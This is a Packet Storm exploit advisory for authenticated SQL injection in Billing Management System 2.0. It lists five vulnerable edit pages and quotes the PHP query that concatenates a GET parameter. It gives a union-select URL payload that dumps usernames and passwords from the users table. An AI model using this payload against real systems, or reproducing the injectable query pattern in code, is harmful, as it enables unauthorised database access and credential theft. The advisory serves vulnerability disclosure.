Billing Management System version 2.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to Pintu Solanki in February of 2021.
25b099897c38e0ddaff2308cfd1337fd34b11049beb099e604bd657696024b66# Exploit Title: Billing Management System 2.0 - Union based SQL injection (Authenticated)
# Date: 2021-05-16
# Exploit Author: Mohammad Koochaki
# Vendor Homepage: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14380&title=Billing+Management+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 2.0
# This web application contains several SQL injection vulnerabilities in the following paths:
- http://localhost/editgroup.php?id=1
- http://localhost/edituser.php?id=1
- http://localhost/editcategory.php?id=10
- http://localhost/editproduct.php?id=1
- http://localhost/editsales.php?id=1
# PoC (editgroup.php):
- Vulnerable code:
$sql="SELECT * from user_groups where delete_status='0' and
id='".$_GET['id']." '";
- Payload:
http://localhost/editgroup.php?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),3,4,5%20from%20users--+
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed